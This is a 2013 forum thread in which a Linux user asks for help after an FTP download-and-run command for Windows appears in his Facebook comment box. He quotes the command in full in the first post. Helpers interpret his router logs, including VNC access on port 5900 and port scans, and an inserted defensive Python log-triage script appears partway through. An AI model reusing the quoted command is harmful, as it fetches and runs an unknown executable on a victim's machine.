Author Topic: [SOLVED] Just been HACKED!  (Read 3195 times)


Offline pooky2483

[SOLVED] Just been HACKED!
« on: August 19, 2013, 08:29:28 pm »
I was just browsing fb and had just finished posting a comment when all of a sudden in the usual comment entry box, I saw this appear...

del eq&echo open 0.0.0.0 14012 >> eq&echo user 30673 32497 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

I have my router log too if either MP or Mark wants to check it over?

« Last Edit: August 25, 2013, 08:14:53 pm by pooky2483 »

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline Melissa

Re: Just been HACKED!
« Reply #1 on: August 19, 2013, 09:35:29 pm »
That's scary! Mark is coming back soon I think- hope he can sort it for you. Hackers are vile.
In a world without fences and walls, who needs Gates and Windows?

Using two computers- Peppermint on old HP laptop and Mint on new Dell netbook.

Offline Mark Greaves (PCNetSpec)

Re: Just been HACKED!
« Reply #2 on: August 19, 2013, 09:52:46 pm »
Bit of a sensationalist title, don't you think ;) ;)

Can't talk for how secure your Fekbook account is .. but that's targeted at Windows, hence the "del" commands, and mention of iexplorer.exe

Any attempt to install any software in Linux would meet with a major FAIL, due to permissions and the execute bit being disabled .. nothing to worry about.

--
« Last Edit: August 19, 2013, 10:23:35 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'

logging in as 'insane' is the only safe option.

Offline pooky2483

Re: Just been HACKED!
« Reply #3 on: August 19, 2013, 10:59:48 pm »
I know, I was laughing my ass off when I was reading it, thinking 'This ain't Window$ ya douche'
But in all seriousness, how did/can they get onto my PC if I've got router firewall on?

I've also noticed an unauthorised access to port 5900
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
And this;
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
And...
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
I have noticed that there are 3 rules set in the UPnP list
http://img197.imageshack.us/img197/1839/as17.png


Offline Mark Greaves (PCNetSpec)

Re: Just been HACKED!
« Reply #4 on: August 20, 2013, 12:26:42 am »
Quote
how did/can they get onto my PC if I've got router firewall on?

They didn't .. if anything they *may* have compromised fekbook.

Quote
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19

Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC

and someone from an IP in Chile is attempting to connect.

If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections

Quote
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17

Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.

Quote
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43

Perfectly normal .. an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust its settings to open a port for it .. the router is just logging the event for reference.
« Last Edit: August 20, 2013, 12:29:25 am by Mark Greaves (PCNetSpec) »

Offline pooky2483

Re: Just been HACKED!
« Reply #5 on: August 20, 2013, 01:27:18 am »
Quote
Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC

Maybe but I don't *knowingly* use it.

Quote
and someone from an IP in Chile is attempting to connect.

As it's not in my port forwarding range then they're trying to hack me!

Quote
If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections

I can't remember installing VNC. What's it used for anyway and what do I do to completely remove all trace of it? And what's 'gufw'?

Quote
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.

That's OK then!

Quote
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43

Perfectly normal .. an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust its settings to open a port for it .. the router is just logging the event for reference.

Why would/does it do that?


Offline salparadise

Re: Just been HACKED!
« Reply #6 on: August 20, 2013, 05:23:23 am »
A Windows using friend, who also uses f'book, now has a machine the screen of which goes white a few seconds after boot.
The hardware is fine as it boots off Linux disks and runs ok.
The last thing he was doing on it was using f'book.
Be silent, or say something better than silence.

Offline pooky2483

Re: Just been HACKED!
« Reply #7 on: August 20, 2013, 12:09:49 pm »
Poor fellow!  ;)


Offline pooky2483

Re: Just been HACKED!
« Reply #8 on: August 20, 2013, 03:24:32 pm »
Mark, I have got VNC installed...'Remote Desktop Viewer'


Offline Mark Greaves (PCNetSpec)

Re: Just been HACKED!
« Reply #9 on: August 20, 2013, 04:31:34 pm »
It's the server you want to remove, not so much the client

What's the output from:
Code:
dpkg -l | grep -i vnc

Offline pooky2483

Re: Just been HACKED!
« Reply #10 on: August 20, 2013, 05:08:46 pm »
pooky2483@pooky2483-ubuntu12:~$ dpkg -l | grep -i vnc
ii  libgtk-vnc-1.0-0                                  0.5.0-1ubuntu1                                       VNC viewer widget for GTK+2 (runtime libraries)
ii  libgtk-vnc-2.0-0                                  0.5.0-1ubuntu1                                       VNC viewer widget for GTK+3 (runtime libraries)
ii  libgvnc-1.0-0                                     0.5.0-1ubuntu1                                       VNC gobject wrapper (runtime libraries)
ii  libvncserver0                                     0.9.8.2-2ubuntu1                                     API to write one's own vnc server
ii  python-gtk-vnc                                    0.5.0-1ubuntu1                                       VNC viewer widget for GTK+2 (Python binding)
ii  vino                                              3.4.2-0ubuntu1.2                                     VNC server for GNOME
pooky2483@pooky2483-ubuntu12:~$


Offline pooky2483

Re: Just been HACKED!
« Reply #11 on: August 21, 2013, 02:40:40 am »
I have just been looking through more of my router logs and found this entry...
[Internet connected] IP address: 82.24.4.95, Tuesday, August 20,2013 10:51:25
Brighton - http://open.mapquest.com/?q=50.8333,-0.1500

I've noticed further attempts...
[DoS Attack: TCP/UDP Chargen] from source: 173.242.115.176, port 33546, Tuesday, August 20,2013 20:12:29
Pennsylvania - http://open.mapquest.com/?q=41.4486,-75.7280

[DoS Attack: ACK Scan] from source: 50.98.118.30, port 57727, Wednesday, August 21,2013 00:38:12
British Columbia - http://open.mapquest.com/?q=49.2667,-122.7833

[DoS Attack: RST Scan] from source: 75.16.229.104, port 19215, Wednesday, August 21,2013 00:41:11
Indiana - http://open.mapquest.com/?q=38.0000,-87.5631

[DoS Attack: RST Scan] from source: 92.109.111.5, port 54188, Wednesday, August 21,2013 00:42:30
Netherlands - http://myip.ms/view/ip_addresses/1550675712/92.109.111.0_92.109.111.255

And someone seems VERY determined to get onto my network as they are trying every 20 - 40 seconds
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50


Offline Mark Greaves (PCNetSpec)

Re: Just been HACKED!
« Reply #12 on: August 21, 2013, 03:37:16 am »
STOP PANICKING

And if the router logs are causing you to panic .. STOP READING THEM

You WILL get your ports scanned regularly, unfortunately there are that many idiot script kiddies in the world automatically scanning random IPs for open ports .. but that's what your router's firewall is for.

And if you think whoever is attempting to access your wireless is going to crack your password if he only tries every 20 seconds, it'll take him forever .. but if it really bothers you, enable MAC address filtering in your router, where the router only allows wireless adapters with MAC addresses you specify to connect.
(that isn't 100% proof against wireless cracking because someone with the correct knowledge could spoof your MAC address, but it does add another layer of security .. there is NO 100% safe wireless security except turning wireless OFF)

Trust me, even if the people who are scanning for open ports find one .. Linux has your back.

The best you can do for whichever neighbour is attempting to connect to your router wirelessly, is keep an eye out for the MAC addresses of connected devices and if there's one connected that shouldn't be .. change the wireless WPA2 key .. but the worst he's liable to do is piggyback your internet connection until you notice him and change the password, it'll then take him ages again to crack the new one.

As I said .. STOP PANICKING or switch to ethernet cabling and disable wireless, which is the only 100% sure fire way of protecting against wireless cracking.

If you're still worried, please read up on network security.
--
« Last Edit: August 21, 2013, 03:59:55 am by Mark Greaves (PCNetSpec) »
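Mark's replies #4 and #12 walk through what each kind of router log entry means: an inbound "LAN access from remote" to port 5900 is the one that matters (a VNC server reachable through a forward), the "DoS Attack" scans are dropped by the router, UPnP rule changes come from the LAN side, and repeated "WLAN access rejected" lines are a neighbour guessing the WPA2 key. The script below, an added example that is not from the thread or any poster, turns that triage into code: it parses lines in the exact format the router emits (the sample lines are constructed in that format) and grades each event the way the replies do. The severity labels and the port-to-service table are assumptions of the example.

```python
import re
from collections import Counter

# Constructed sample in the router's log format as shown in the thread.
SAMPLE_LOG = """\
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:56:20
"""

LAN_ACCESS = re.compile(r"^\[LAN access from remote\] from ([\d.]+):(\d+) to ([\d.]+):(\d+)")
DOS_SCAN = re.compile(r"^\[DoS Attack: ([^\]]+)\] from source: ([\d.]+), port (\d+)")
UPNP = re.compile(r"^\[UPnP set event: (\w+)\] from source ([\d.]+)")
WLAN_REJECT = re.compile(r"^\[WLAN access rejected: [^\]]+\] from MAC address ([0-9a-fA-F:]+),")

# Ports worth naming when something from the internet reaches a LAN host (assumed table; 5900 = VNC).
SERVICE_PORTS = {5900: "VNC"}


def triage(log_text):
    """Return (findings, wlan_counter). findings is a list of (severity, message) in log order,
    with one summary entry per MAC seen in rejected wireless joins appended at the end."""
    findings, wlan = [], Counter()
    for line in log_text.splitlines():
        m = LAN_ACCESS.match(line)
        if m:
            src, dst, dport = m.group(1), m.group(3), int(m.group(4))
            svc = SERVICE_PORTS.get(dport, "unknown service")
            # A connection that actually reached a LAN host means a forward or UPnP rule exists.
            findings.append(("HIGH", f"{src} reached {dst}:{dport} ({svc}); remove the forward or stop the server"))
            continue
        m = DOS_SCAN.match(line)
        if m:  # the router logs these because it dropped them; informational only
            findings.append(("INFO", f"{m.group(1)} from {m.group(2)} dropped by router"))
            continue
        m = UPNP.match(line)
        if m:  # originates from the LAN side, so it is an application asking for a port
            findings.append(("INFO", f"UPnP {m.group(1)} requested by LAN host {m.group(2)}"))
            continue
        m = WLAN_REJECT.match(line)
        if m:
            wlan[m.group(1)] += 1
    for mac, n in wlan.items():
        sev = "MEDIUM" if n >= 2 else "LOW"
        findings.append((sev, f"{n} rejected wireless joins from {mac}; consider MAC filtering or rotating the WPA2 key"))
    return findings, wlan
```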

Offline pooky2483

Re: Just been HACKED!
« Reply #13 on: August 21, 2013, 10:35:14 am »
I'm NOT panicking.
If I was I'd be begging and pleading for help on how to stop these people from doing stuff. I'm just commenting on who and what is happening.


I'm actually having fun mapping them on Google :-)
« Last Edit: August 21, 2013, 12:59:13 pm by pooky2483 »


Offline pooky2483

Re: Just been HACKED!
« Reply #14 on: August 21, 2013, 01:54:53 pm »
I need to disable VNC as someone managed to get on my PC through port 5900
[LAN access from remote] from 50.116.40.245:43314 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43232 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43218 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
